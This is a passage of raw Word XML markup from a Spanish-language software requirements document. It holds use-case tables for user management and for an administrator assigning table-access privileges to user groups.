              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar algún campo modificable.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="842" w:hanging="425"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Modificar.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="842" w:hanging="425"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Restablecer contraseña.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="842" w:hanging="425"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dar de baja y/o Dar de alta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE"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7" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="567"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4213" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.2. El usuario no tiene email o celular  a donde enviar la contraseña reestablecida.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC"/>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc404803460"/>
      <w:bookmarkStart w:id="45" w:name="_Toc454371308"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Asignar p</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0282">
        <w:t>rivilegios</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="007C1EFC" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00675212">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E159FC6" wp14:editId="0E9F440D">
            <wp:extent cx="3589913" cy="97819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2926" t="16883" r="5122" b="8442"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3594627" cy="979479"/>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decuadrcula4-nfasis1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2666"/>
        <w:gridCol w:w="6162"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">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510" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00EC6643" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC6643">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Caso de uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00EC6643" w:rsidRDefault="00491F38" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>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CU2</w:t>
            </w:r>
            <w:r w:rsidR="007C1EFC" w:rsidRPr="00EC6643">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="007C1EFC">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asignar p</w:t>
            </w:r>
            <w:r w:rsidR="007C1EFC" w:rsidRPr="00EC6643">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rivilegios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE"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10" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="19"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Almacena las tablas de la base de datos a las que puede acceder un grupo de usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1510" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cuando se crea un grupo nuevo el administrador del sistema puede elegir y restringir las tablas a las que se puede acceder, también se puede modificar los accesos en caso de necesitarse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">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510" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="19"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1510" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actor iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="19"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE"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10" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="0" w:firstLine="19"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1510" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D31A4F">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3490" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="445" w:hanging="559"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar grupo</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="445" w:hanging="142"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar casos de uso.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="2"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:left="1153" w:hanging="567"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar acciones.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00714FCE" w:rsidRDefault="007C1EFC" w:rsidP="00954840">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:ind w:hanging="842"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00714FCE">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Guardar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C1EFC" w:rsidRPr="00714FCE"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10" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="007C1EFC" w:rsidRPr="00D31A4F" w:rsidRDefault="007C1EFC" w:rsidP="007C1EFC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="426"/>
              </w:tabs>
              <w:spacing w:after="100" w:afterAutospacing="1"/>
              <w:rPr>
